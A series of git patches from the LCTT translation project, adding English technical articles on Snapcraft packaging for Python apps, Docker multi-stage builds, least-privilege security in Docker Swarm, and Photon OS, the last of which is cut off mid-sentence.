organizations using the project — this person could help introduce those developers to the codebase and guide them through their first commit. + +### What happens if the project doesn’t hit the goals? + + _“I have not failed. I’ve just found 10,000 ways that won’t work.”_  — Thomas A. Edison + +Figuring out what is within the capability of an organization — whether Fortune 500 or a small open source project — is hard. And, sometimes the expectations or market conditions change along the way. Does that make the strategy planning process a failure? Absolutely not! + +Instead, you can use this experience as a way to better understand your project’s velocity, its impact, and its community, and perhaps as a way to prioritize what is important and what’s not. + +-------------------------------------------------------------------------------- + +via: https://www.linuxfoundation.org/blog/set-open-source-strategy/ + +作者:[ John Mertic][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.linuxfoundation.org/author/jmertic/ +[1]:https://en.wikipedia.org/wiki/Big_Hairy_Audacious_Goal +[2]:https://www.linuxfoundation.org/author/jmertic/ +[3]:https://www.linuxfoundation.org/category/blog/ +[4]:https://www.linuxfoundation.org/category/audience/c-level/ +[5]:https://www.linuxfoundation.org/category/audience/developer-influencers/ +[6]:https://www.linuxfoundation.org/category/audience/entrepreneurs/ +[7]:https://www.linuxfoundation.org/category/campaigns/membership/how-to/ +[8]:https://www.linuxfoundation.org/category/campaigns/events-campaigns/linux-foundation/ +[9]:https://www.linuxfoundation.org/category/audience/open-source-developers/ +[10]:https://www.linuxfoundation.org/category/audience/open-source-professionals/ +[11]:https://www.linuxfoundation.org/category/audience/open-source-users/ +[12]:https://www.linuxfoundation.org/category/blog/thought-leadership/ From 211611fe715fc2a8be9c446eecbd706652ab13f3 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:37:38 +0800 Subject: [PATCH 0167/1627] =?UTF-8?q?20171203-2=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... millions of Linux users with Snapcraft.md | 321 ++++++++++++++++++ 1 file changed, 321 insertions(+) create mode 100644 sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md diff --git a/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md b/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md new file mode 100644 index 0000000000..dbdebf63e3 --- /dev/null +++ b/sources/tech/20171202 Easily control delivery of your Python applications to millions of Linux users with Snapcraft.md @@ -0,0 +1,321 @@ +Python +============================================================ + +Python has rich tools for packaging, distributing and sandboxing applications. Snapcraft builds on top of these familiar tools such as `pip`, `setup.py` and `requirements.txt` to create snaps for people to install on Linux. + +### What problems do snaps solve for Python applications? + +Linux install instructions for Python applications often get complicated. System dependencies, which differ from distribution to distribution, must be separately installed. To prevent modules from different Python applications clashing with each other, developer tools like `virtualenv` or `venv` must be used. With snapcraft it’s one command to produce a bundle that works anywhere. + +Here are some snap advantages that will benefit many Python projects: + +* Bundle all the runtime requirements, including the exact versions of system libraries and the Python interpreter. + +* Simplify installation instructions, regardless of distribution, to `snap install mypythonapp`. + +* Directly control the delivery of automatic application updates. + +* Extremely simple creation of daemons. + +### Getting started + +Let’s take a look at offlineimap and youtube-dl by way of examples. Both are command line applications. offlineimap uses Python 2 and only has Python module requirements. youtube-dl uses Python 3 and has system package requirements, in this case `ffmpeg`. + +### offlineimap + +Snaps are defined in a single yaml file placed in the root of your project. The offlineimap example shows the entire `snapcraft.yaml` for an existing project. We’ll break this down. + +``` +name: offlineimap +version: git +summary: OfflineIMAP +description: | + OfflineIMAP is software that downloads your email mailbox(es) as local + Maildirs. OfflineIMAP will synchronize both sides via IMAP. + +grade: devel +confinement: devmode + +apps: + offlineimap: + command: bin/offlineimap + +parts: + offlineimap: + plugin: python + python-version: python2 + source: . + +``` + +#### Metadata + +The `snapcraft.yaml` starts with a small amount of human-readable metadata, which usually can be lifted from the GitHub description or project README.md. This data is used in the presentation of your app in the Snap Store. The `summary:` can not exceed 79 characters. You can use a pipe with the `description:` to declare a multi-line description. + +``` +name: offlineimap +version: git +summary: OfflineIMAP +description: | + OfflineIMAP is software that downloads your email mailbox(es) as local + Maildirs. OfflineIMAP will synchronize both sides via IMAP. + +``` + +#### Confinement + +To get started we won’t confine this application. Unconfined applications, specified with `devmode`, can only be released to the hidden “edge” channel where you and other developers can install them. + +``` +confinement: devmode + +``` + +#### Parts + +Parts define how to build your app. Parts can be anything: programs, libraries, or other assets needed to create and run your application. In this case we have one: the offlineimap source code. In other cases these can point to local directories, remote git repositories, or tarballs. + +The Python plugin will also bundle Python in the snap, so you can be sure that the version of Python you test against is included with your app. Dependencies from `install_requires` in your `setup.py` will also be bundled. Dependencies from a `requirements.txt` file can also be bundled using the `requirements:` option. + +``` +parts: + offlineimap: + plugin: python + python-version: python2 + source: . + +``` + +#### Apps + +Apps are the commands and services exposed to end users. If your command name matches the snap `name`, users will be able run the command directly. If the names differ, then apps are prefixed with the snap `name`(`offlineimap.command-name`, for example). This is to avoid conflicting with apps defined by other installed snaps. + +If you don’t want your command prefixed you can request an alias for it on the [Snapcraft forum][1]. These command aliases are set up automatically when your snap is installed from the Snap Store. + +``` +apps: + offlineimap: + command: bin/offlineimap + +``` + +If your application is intended to run as a service, add the line `daemon: simple` after the command keyword. This will automatically keep the service running on install, update and reboot. + +### Building the snap + +You’ll first need to [install snap support][2], and then install the snapcraft tool: + +``` +sudo snap install --beta --classic snapcraft + +``` + +If you have just installed snap support, start a new shell so your `PATH` is updated to include `/snap/bin`. You can then build this example yourself: + +``` +git clone https://github.com/snapcraft-docs/offlineimap +cd offlineimap +snapcraft + +``` + +The resulting snap can be installed locally. This requires the `--dangerous` flag because the snap is not signed by the Snap Store. The `--devmode` flag acknowledges that you are installing an unconfined application: + +``` +sudo snap install offlineimap_*.snap --devmode --dangerous + +``` + +You can then try it out: + +``` +offlineimap + +``` + +Removing the snap is simple too: + +``` +sudo snap remove offlineimap + +``` + +Jump ahead to [Share with your friends][3] or continue to read another example. + +### youtube-dl + +The youtube-dl example shows a `snapcraft.yaml` using a tarball of a Python application and `ffmpeg` bundled in the snap to satisfy the runtime requirements. Here is the entire `snapcraft.yaml` for youtube-dl. We’ll break this down. + +``` +name: youtube-dl +version: 2017.06.18 +summary: YouTube Downloader. +description: | + youtube-dl is a small command-line program to download videos from + YouTube.com and a few more sites. + +grade: devel +confinement: devmode + +parts: + youtube-dl: + source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz + plugin: python + python-version: python3 + after: [ffmpeg] + +apps: + youtube-dl: + command: bin/youtube-dl + +``` + +#### Parts + +The `$SNAPCRAFT_PROJECT_VERSION` variable is derived from the `version:` stanza and used here to reference the matching release tarball. Because the `python` plugin is used, snapcraft will bundle a copy of Python in the snap using the version specified in the `python-version:` stanza, in this case Python 3. + +youtube-dl makes use of `ffmpeg` to transcode or otherwise convert the audio and video file it downloads. In this example, youtube-dl is told to build after the `ffmpeg` part. Because the `ffmpeg` part specifies no plugin, it will be fetched from the parts repository. This is a collection of community-contributed definitions which can be used by anyone when building a snap, saving you from needing to specify the source and build rules for each system dependency. You can use `snapcraft search` to find more parts to use and `snapcraft define ` to verify how the part is defined. + +``` +parts: + youtube-dl: + source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz + plugin: python + python-version: python3 + after: [ffmpeg] + +``` + +### Building the snap + +You can build this example yourself by running the following: + +``` +git clone https://github.com/snapcraft-docs/youtube-dl +cd youtube-dl +snapcraft + +``` + +The resulting snap can be installed locally. This requires the `--dangerous` flag because the snap is not signed by the Snap Store. The `--devmode` flag acknowledges that you are installing an unconfined application: + +``` +sudo snap install youtube-dl_*.snap --devmode --dangerous + +``` + +Run the command: + +``` +youtube-dl “https://www.youtube.com/watch?v=k-laAxucmEQ” + +``` + +Removing the snap is simple too: + +``` +sudo snap remove youtube-dl + +``` + +### Share with your friends + +To share your snaps you need to publish them in the Snap Store. First, create an account on [the dashboard][4]. Here you can customize how your snaps are presented, review your uploads and control publishing. + +You’ll need to choose a unique “developer namespace” as part of the account creation process. This name will be visible by users and associated with your published snaps. + +Make sure the `snapcraft` command is authenticated using the email address attached to your Snap Store account: + +``` +snapcraft login + +``` + +### Reserve a name for your snap + +You can publish your own version of a snap, provided you do so under a name you have rights to. + +``` +snapcraft register mypythonsnap + +``` + +Be sure to update the `name:` in your `snapcraft.yaml` to match this registered name, then run `snapcraft` again. + +### Upload your snap + +Use snapcraft to push the snap to the Snap Store. + +``` +snapcraft push --release=edge mypthonsnap_*.snap + +``` + +If you’re happy with the result, you can commit the snapcraft.yaml to your GitHub repo and [turn on automatic builds][5] so any further commits automatically get released to edge, without requiring you to manually build locally. + +### Further customisations + +Here are all the Python plugin-specific keywords: + +``` +- requirements: + (string) + Path to a requirements.txt file +- constraints: + (string) + Path to a constraints file +- process-dependency-links: + (bool; default: false) + Enable the processing of dependency links in pip, which allow one project + to provide places to look for another project +- python-packages: + (list) + A list of dependencies to get from PyPI +- python-version: + (string; default: python3) + The python version to use. Valid options are: python2 and python3 + +``` + +You can view them locally by running: + +``` +snapcraft help python + +``` + +### Extending and overriding behaviour + +You can [extend the behaviour][6] of any part in your `snapcraft.yaml` with shell commands. These can be run after pulling the source code but before building by using the `prepare` keyword. The build process can be overridden entirely using the `build` keyword and shell commands. The `install` keyword is used to run shell commands after building your code, useful for making post build modifications such as relocating build assets. + +Using the youtube-dl example above, we can run the test suite at the end of the build. If this fails, the snap creation will be terminated: + +``` +parts: + youtube-dl: + source: https://github.com/rg3/youtube-dl/archive/$SNAPCRAFT_PROJECT_VERSION.tar.gz + plugin: python + python-version: python3 + stage-packages: [ffmpeg, python-nose] + install: | + nosetests +``` + +-------------------------------------------------------------------------------- + +via: https://docs.snapcraft.io/build-snaps/python + +作者:[Snapcraft.io ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:Snapcraft.io + +[1]:https://forum.snapcraft.io/t/process-for-reviewing-aliases-auto-connections-and-track-requests/455 +[2]:https://docs.snapcraft.io/core/install +[3]:https://docs.snapcraft.io/build-snaps/python#share-with-your-friends +[4]:https://dashboard.snapcraft.io/openid/login/?next=/dev/snaps/ +[5]:https://build.snapcraft.io/ +[6]:https://docs.snapcraft.io/build-snaps/scriptlets From 19d8719beca49784f5ea274284de3cbbc0c7b6e5 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:39:25 +0800 Subject: [PATCH 0168/1627] =?UTF-8?q?20171203-3=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...0171202 docker - Use multi-stage builds.md | 127 ++++++++++++++++++ 1 file changed, 127 insertions(+) create mode 100644 sources/tech/20171202 docker - Use multi-stage builds.md diff --git a/sources/tech/20171202 docker - Use multi-stage builds.md b/sources/tech/20171202 docker - Use multi-stage builds.md new file mode 100644 index 0000000000..e1a6414862 --- /dev/null +++ b/sources/tech/20171202 docker - Use multi-stage builds.md @@ -0,0 +1,127 @@ +Use multi-stage builds +============================================================ + +Multi-stage builds are a new feature requiring Docker 17.05 or higher on the daemon and client. Multistage builds are useful to anyone who has struggled to optimize Dockerfiles while keeping them easy to read and maintain. + +> Acknowledgment: Special thanks to [Alex Ellis][1] for granting permission to use his blog post [Builder pattern vs. Multi-stage builds in Docker][2] as the basis of the examples below. + +### Before multi-stage builds + +One of the most challenging things about building images is keeping the image size down. Each instruction in the Dockerfile adds a layer to the image, and you need to remember to clean up any artifacts you don’t need before moving on to the next layer. To write a really efficient Dockerfile, you have traditionally needed to employ shell tricks and other logic to keep the layers as small as possible and to ensure that each layer has the artifacts it needs from the previous layer and nothing else. + +It was actually very common to have one Dockerfile to use for development (which contained everything needed to build your application), and a slimmed-down one to use for production, which only contained your application and exactly what was needed to run it. This has been referred to as the “builder pattern”. Maintaining two Dockerfiles is not ideal. + +Here’s an example of a `Dockerfile.build` and `Dockerfile` which adhere to the builder pattern above: + +`Dockerfile.build`: + +``` +FROM golang:1.7.3 +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN go get -d -v golang.org/x/net/html \ + && CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +``` + +Notice that this example also artificially compresses two `RUN` commands together using the Bash `&&` operator, to avoid creating an additional layer in the image. This is failure-prone and hard to maintain. It’s easy to insert another command and forget to continue the line using the `\` character, for example. + +`Dockerfile`: + +``` +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY app . +CMD ["./app"] + +``` + +`build.sh`: + +``` +#!/bin/sh +echo Building alexellis2/href-counter:build + +docker build --build-arg https_proxy=$https_proxy --build-arg http_proxy=$http_proxy \ + -t alexellis2/href-counter:build . -f Dockerfile.build + +docker create --name extract alexellis2/href-counter:build +docker cp extract:/go/src/github.com/alexellis/href-counter/app ./app +docker rm -f extract + +echo Building alexellis2/href-counter:latest + +docker build --no-cache -t alexellis2/href-counter:latest . +rm ./app + +``` + +When you run the `build.sh` script, it needs to build the first image, create a container from it in order to copy the artifact out, then build the second image. Both images take up room on your system and you still have the `app` artifact on your local disk as well. + +Multi-stage builds vastly simplify this situation! + +### Use multi-stage builds + +With multi-stage builds, you use multiple `FROM` statements in your Dockerfile. Each `FROM` instruction can use a different base, and each of them begins a new stage of the build. You can selectively copy artifacts from one stage to another, leaving behind everything you don’t want in the final image. To show how this works, Let’s adapt the Dockerfile from the previous section to use multi-stage builds. + +`Dockerfile`: + +``` +FROM golang:1.7.3 +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY --from=0 /go/src/github.com/alexellis/href-counter/app . +CMD ["./app"] + +``` + +You only need the single Dockerfile. You don’t need a separate build script, either. Just run `docker build`. + +``` +$ docker build -t alexellis2/href-counter:latest . + +``` + +The end result is the same tiny production image as before, with a significant reduction in complexity. You don’t need to create any intermediate images and you don’t need to extract any artifacts to your local system at all. + +How does it work? The second `FROM` instruction starts a new build stage with the `alpine:latest` image as its base. The `COPY --from=0` line copies just the built artifact from the previous stage into this new stage. The Go SDK and any intermediate artifacts are left behind, and not saved in the final image. + +### Name your build stages + +By default, the stages are not named, and you refer to them by their integer number, starting with 0 for the first `FROM` instruction. However, you can name your stages, by adding an `as ` to the `FROM` instruction. This example improves the previous one by naming the stages and using the name in the `COPY` instruction. This means that even if the instructions in your Dockerfile are re-ordered later, the `COPY` won’t break. + +``` +FROM golang:1.7.3 as builder +WORKDIR /go/src/github.com/alexellis/href-counter/ +RUN go get -d -v golang.org/x/net/html +COPY app.go . +RUN CGO_ENABLED=0 GOOS=linux go build -a -installsuffix cgo -o app . + +FROM alpine:latest +RUN apk --no-cache add ca-certificates +WORKDIR /root/ +COPY --from=builder /go/src/github.com/alexellis/href-counter/app . +CMD ["./app"] +``` + +-------------------------------------------------------------------------------- + +via: https://docs.docker.com/engine/userguide/eng-image/multistage-build/#name-your-build-stages + +作者:[docker docs ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://docs.docker.com/engine/userguide/eng-image/multistage-build/ +[1]:https://twitter.com/alexellisuk +[2]:http://blog.alexellis.io/mutli-stage-docker-builds/ From 2f7336de974417f614a8ee8dd5bd12d29b491f2c Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:43:14 +0800 Subject: [PATCH 0169/1627] =?UTF-8?q?20171203-4=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...LEAST PRIVILEGE CONTAINER ORCHESTRATION.md | 174 ++++++++++++++++++ 1 file changed, 174 insertions(+) create mode 100644 sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md diff --git a/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md new file mode 100644 index 0000000000..7a9b6e817c --- /dev/null +++ b/sources/tech/20171011 LEAST PRIVILEGE CONTAINER ORCHESTRATION.md @@ -0,0 +1,174 @@ +# LEAST PRIVILEGE CONTAINER ORCHESTRATION + + +The Docker platform and the container has become the standard for packaging, deploying, and managing applications. In order to coordinate running containers across multiple nodes in a cluster, a key capability is required: a container orchestrator. + +![container orchestrator](https://i0.wp.com/blog.docker.com/wp-content/uploads/f753d4e8-9e22-4fe2-be9a-80661ef696a8-3.jpg?resize=536%2C312&ssl=1) + +Orchestrators are responsible for critical clustering and scheduling tasks, such as: + +* Managing container scheduling and resource allocation. + +* Support service discovery and hitless application deploys. + +* Distribute the necessary resources that applications need to run. + +Unfortunately, the distributed nature of orchestrators and the ephemeral nature of resources in this environment makes securing orchestrators a challenging task. In this post, we will describe in detail the less-considered—yet vital—aspect of the security model of container orchestrators, and how Docker Enterprise Edition with its built-in orchestration capability, Swarm mode, overcomes these difficulties. + +Motivation and threat model +============================================================ + +One of the primary objectives of Docker EE with swarm mode is to provide an orchestrator with security built-in. To achieve this goal, we developed the first container orchestrator designed with the principle of least privilege in mind. + +In computer science,the principle of least privilege in a distributed system requires that each participant of the system must only have access to  the information and resources that are necessary for its legitimate purpose. No more, no less. + +> #### ”A process must be able to access only the information and resources that are necessary for its legitimate purpose.” + +#### Principle of Least Privilege + +Each node in a Docker EE swarm is assigned role: either manager or worker. These roles define a coarsegrained level of privilege to the nodes: administration and task execution, respectively. However, regardless of its role, a node has access only to the information and resources it needs to perform the necessary tasks, with cryptographically enforced guarantees. As a result, it becomes easier to secure clusters against even the most sophisticated attacker models: attackers that control the underlying communication networks or even compromised cluster nodes. + +# Secure-by-default core + +There is an old security maxim that states: if it doesn’t come by default, no one will use it. Docker Swarm mode takes this notion to heart, and ships with secure-by-default mechanisms to solve three of the hardest and most important aspects of the orchestration lifecycle: + +1. Trust bootstrap and node introduction. + +2. Node identity issuance and management. + +3. Authenticated, Authorized, Encrypted information storage and dissemination. + +Let’s look at each of these aspects individually + +### Trust Bootstrap and Node Introduction + +The first step to a secure cluster is tight control over membership and identity. Without it, administrators cannot rely on the identities of their nodes and enforce strict workload separation between nodes. This means that unauthorized nodes can’t be allowed to join the cluster, and nodes that are already part of the cluster aren’t able to change identities, suddenly pretending to be another node. + +To address this need, nodes managed by Docker EE’s Swarm mode maintain strong, immutable identities. The desired properties are cryptographically guaranteed by using two key building-blocks: + +1. Secure join tokens for cluster membership. + +2. Unique identities embedded in certificates issued from a central certificate authority. + +### Joining the Swarm + +To join the swarm, a node needs a copy of a secure join token. The token is unique to each operational role within the cluster—there are currently two types of nodes: workers and managers. Due to this separation, a node with a copy of a worker token will not be allowed to join the cluster as a manager. The only way to get this special token is for a cluster administrator to interactively request it from the cluster’s manager through the swarm administration API. + +The token is securely and randomly generated, but it also has a special syntax that makes leaks of this token easier to detect: a special prefix that you can easily monitor for in your logs and repositories. Fortunately, even if a leak does occur, tokens are easy to rotate, and we recommend that you rotate them often—particularly in the case where your cluster will not be scaling up for a while. + +![Docker Swarm](https://i1.wp.com/blog.docker.com/wp-content/uploads/92d171d4-52c7-4702-8143-110c6f52017c-2.jpg?resize=547%2C208&ssl=1) + +### Bootstrapping trust + +As part of establishing its identity, a new node will ask for a new identity to be issued by any of the network managers. However, under our threat model, all communications can be intercepted by a third-party. This begs the question: how does a node know that it is talking to a legitimate manager? + +![Docker Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/94e3fef0-5bd2-4970-b9e9-25b566d926ad-2.jpg?resize=528%2C348&ssl=1) + +Fortunately, Docker has a built-in mechanism for preventing this from happening. The join token, which the host uses to join the swarm, includes a hash of the root CA’s certificate. The host can therefore use one-way TLS and use the hash to verify that it’s joining the right swarm: if the manager presents a certificate not signed by a CA that matches the hash, the node knows not to trust it. + +### Node identity issuance and management + +Identities in a swarm are embedded in x509 certificates held by each individual node. In a manifestation of the least privilege principle, the certificates’ private keys are restricted strictly to the hosts where they originate. In particular, managers do not have access to private keys of any certificate but their own. + +### Identity Issuance + +To receive their certificates without sharing their private keys, new hosts begin by issuing a certificate signing request (CSR), which the managers then convert into a certificate. This certificate now becomes the new host’s identity, making the node a full-fledged member of the swarm! + +#### +![](https://i0.wp.com/blog.docker.com/wp-content/uploads/415ae6cf-7e76-4ba8-9d84-6d49bf327d8f-2.jpg?resize=548%2C350&ssl=1) + +When used alongside with the secure bootstrapping mechanism, this mechanism for issuing identities to joining nodes is secure by default: all communicating parties are authenticated, authorized and no sensitive information is ever exchanged in clear-text. + +### Identity Renewal + +However, securely joining nodes to a swarm is only part of the story. To minimize the impact of leaked or stolen certificates and to remove the complexity of managing CRL lists, Swarm mode uses short-lived certificates for the identities. These certificates have a default expiration of three months, but can be configured to expire every hour! + +![Docker secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/55e2ab9a-19cd-465d-82c6-fa76110e7ecd-2.jpg?resize=556%2C365&ssl=1) + +This short certificate expiration time means that certificate rotation can’t be a manual process, as it usually is for most PKI systems. With swarm, all certificates are rotated automatically and in a hitless fashion. The process is simple: using a mutually authenticated TLS connection to prove ownership over a particular identity, a Swarm node generates regularly a new public/private key pair and sends the corresponding CSR to be signed, creating a completely new certificate, but maintaining the same identity. + +### Authenticated, Authorized, Encrypted information storage and dissemination. + +During the normal operation of a swarm, information about the tasks has to be sent to the worker nodes for execution. This includes not only information on which containers are to be executed by a node;but also, it includes  all the resources that are necessary for the successful execution of that container, including sensitive secrets such as private keys, passwords, and API tokens. + +### Transport Security + +The fact that every node participating in a swarm is in possession of a unique identity in the form of a X509 certificate, communicating securely between nodes is trivial: nodes can use their respective certificates to establish mutually authenticated connections between one another, inheriting the confidentiality, authenticity and integrity properties of TLS. + +![Swarm Mode](https://i0.wp.com/blog.docker.com/wp-content/uploads/972273a3-d9e5-4053-8fcb-a407c8cdcbf6-2.jpg?resize=347%2C271&ssl=1) + +One interesting detail about Swarm mode is the fact that it uses a push model: only managers are allowed to send information to workers—significantly reducing the surface of attack manager nodes expose to the less privileged worker nodes. + +### Strict Workload Separation Into Security Zones + +One of the responsibilities of manager nodes is deciding which tasks to send to each of the workers. Managers make this determination using a variety of strategies; scheduling the workloads across the swarm depending on both the unique properties of each node and each workload. + +In Docker EE with Swarm mode, administrators have the ability of influencing these scheduling decisions by using labels that are securely attached to the individual node identities. These labels allow administrators to group nodes together into different security zones limiting the exposure of particularly sensitive workloads and any secrets related to them. + +![Docker Swarm Security](https://i0.wp.com/blog.docker.com/wp-content/uploads/67ffa551-d4ae-4522-ba13-4a646a158592-2.jpg?resize=546%2C375&ssl=1) + +### Secure Secret Distribution + +In addition to facilitating the identity issuance process, manager nodes have the important task of storing and distributing any resources needed by a worker. Secrets are treated like any other type of resource, and are pushed down from the manager to the worker over the secure mTLS connection. + +![Docker Secrets](https://i1.wp.com/blog.docker.com/wp-content/uploads/4341da98-2f8c-4aed-bb40-607246344dd8-2.jpg?resize=508%2C326&ssl=1) + +On the hosts, Docker EE ensures that secrets are provided only to the containers they are destined for. Other containers on the same host will not have access to them. Docker exposes secrets to a container as a temporary file system, ensuring that secrets are always stored in memory and never written to disk. This method is more secure than competing alternatives, such as [storing them in environment variables][12]. Once a task completes the secret is gone forever. + +### Storing secrets + +On manager hosts secrets are always encrypted at rest. By default, the key that encrypts these secrets (known as the Data Encryption Key, DEK) is also stored in plaintext on disk. This makes it easy for those with minimal security requirements to start using Docker Swarm mode. + +However, once you are running a production cluster, we recommend you enable auto-lock mode. When auto-lock mode is enabled, a newly rotated DEK is encrypted with a separate Key Encryption Key (KEK). This key is never stored on the cluster; the administrator is responsible for storing it securely and providing it when the cluster starts up. This is known as unlocking the swarm. + +Swarm mode supports multiple managers, relying on the Raft Consensus Algorithm for fault tolerance. Secure secret storage scales seamlessly in this scenario. Each manager host has a unique disk encryption key, in addition to the shared key. Furthermore, Raft logs are encrypted on disk and are similarly unavailable without the KEK when in autolock mode. + +### What happens when a node is compromised? + +![Docker Secrets](https://i0.wp.com/blog.docker.com/wp-content/uploads/2a78b37d-bbf0-40ee-a282-eb0900f71ba9-2.jpg?resize=502%2C303&ssl=1) + +In traditional orchestrators, recovering from a compromised host is a slow and complicated process. With Swarm mode, recovery is as easy as running the docker node rm command. This removes the affected node from the cluster, and Docker will take care of the rest, namely re-balancing services and making sure other hosts know not to talk to the affected node. + +As we have seen, thanks to least privilege orchestration, even if the attacker were still active on the host, they would be cut off from the rest of the network. The host’s certificate — its identity — is blacklisted, so the managers will not accept it as valid. + +# Conclusion + +Docker EE with Swarm mode ensures security by default in all key areas of orchestration: + +* Joining the cluster. Prevents malicious nodes from joining the cluster. + +* Organizing hosts into security zones. Prevents lateral movement by attackers. + +* Scheduling tasks. Tasks will be issued only to designated and allowed nodes. + +* Allocating resources. A malicious node cannot “steal” another’s workload or resources. + +* Storing secrets. Never stored in plaintext and never written to disk on worker nodes. + +* Communicating with the workers. Encrypted using mutually authenticated TLS. + +As Swarm mode continues to improve, the Docker team is working to take the principle of least privilege orchestration even further. The task we are tackling is: how can systems remain secure if a manager is compromised? The roadmap is in place, with some of the features already available such as the ability of whitelisting only specific Docker images, preventing managers from executing arbitrary workloads. This is achieved quite naturally using Docker Content Trust. + +-------------------------------------------------------------------------------- + +via: https://blog.docker.com/2017/10/least-privilege-container-orchestration/ + +作者:[Diogo Mónica ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://blog.docker.com/author/diogo/ +[1]:http://www.linkedin.com/shareArticle?mini=true&url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration&summary=The%20Docker%20platform%20and%20the%20container%20has%20become%20the%20standard%20for%20packaging,%20deploying,%20and%20managing%20applications.%20In%20order%20to%20coordinate%20running%20containers%20across%20multiple%20nodes%20in%20a%20cluster,%20a%20key%20capability%20is%20required:%20a%20container%20orchestrator.Orchestrators%20are%20responsible%20for%20critical%20clustering%20and%20scheduling%20tasks,%20such%20as:%20%20%20%20Managing%20... +[2]:http://www.reddit.com/submit?url=http://dockr.ly/2yZoNdy&title=Least%20Privilege%20Container%20Orchestration +[3]:https://plus.google.com/share?url=http://dockr.ly/2yZoNdy +[4]:http://news.ycombinator.com/submitlink?u=http://dockr.ly/2yZoNdy&t=Least%20Privilege%20Container%20Orchestration +[5]:https://blog.docker.com/author/diogo/ +[6]:https://blog.docker.com/tag/docker-orchestration/ +[7]:https://blog.docker.com/tag/docker-secrets/ +[8]:https://blog.docker.com/tag/docker-security/ +[9]:https://blog.docker.com/tag/docker-swarm/ +[10]:https://blog.docker.com/tag/least-privilege-orchestrator/ +[11]:https://blog.docker.com/tag/tls/ +[12]:https://diogomonica.com/2017/03/27/why-you-shouldnt-use-env-variables-for-secret-data/ From 7a50e85d810122ffdfa095b4d373c2a4cbe38618 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sun, 3 Dec 2017 19:44:32 +0800 Subject: [PATCH 0170/1627] =?UTF-8?q?20171203-5=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Could Be Your New Favorite Container OS.md | 146 ++++++++++++++++++ 1 file changed, 146 insertions(+) create mode 100644 sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md diff --git a/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md new file mode 100644 index 0000000000..d282ef5445 --- /dev/null +++ b/sources/tech/20171124 Photon Could Be Your New Favorite Container OS.md @@ -0,0 +1,146 @@ +Photon Could Be Your New Favorite Container OS +============================================================ + +![Photon OS](https://www.linux.com/sites/lcom/files/styles/rendered_file/public/photon-linux.jpg?itok=jUFHPR_c "Photon OS") +Jack Wallen says Photon OS is an outstanding platform, geared specifically for containers.[Creative Commons Zero][5]Pixabay + +Containers are all the rage, and with good reason. [As discussed previously][13], containers allow you to quickly and easily deploy new services and applications onto your network, without requiring too much in the way of added system resources. Containers are more cost-effective than using dedicated hardware or virtual machines, and they’re easier to update and reuse. + +Best of all, containers love Linux (and vice versa). Without much trouble or time, you can get a Linux server up and running with [Docker][14] and deploying containers. But, which Linux distribution is best suited for the deployment of your containers? There are a _lot_  of options. You could go with a standard Ubuntu Server platform (which makes installing Docker and deploying containers incredibly easy), or you could opt for a lighter weight distribution — one geared specifically for the purpose of deploying containers. + +One such distribution is [Photon][15]. This particular platform was created in 2005 by [VMware][16]; it includes the Docker daemon and works with container frameworks, such as Mesos and Kubernetes. Photon is optimized to work with [VMware vSphere][17], but it can be used on bare metal, [Microsoft Azure][18], [Google Compute Engine][19], [Amazon Elastic Compute Cloud][20], or [VirtualBox][21]. + +Photon manages to stay slim by only installing what is absolutely necessary to run the Docker daemon. In the end, the distribution comes in around 300 MB. This is just enough Linux make it all work. The key features to Photon are: + +* Kernel tuned for performance. + +* Kernel is hardened according to the [Kernel Self-Protection Project][6] (KSPP). + +* All installed packages are built with hardened security 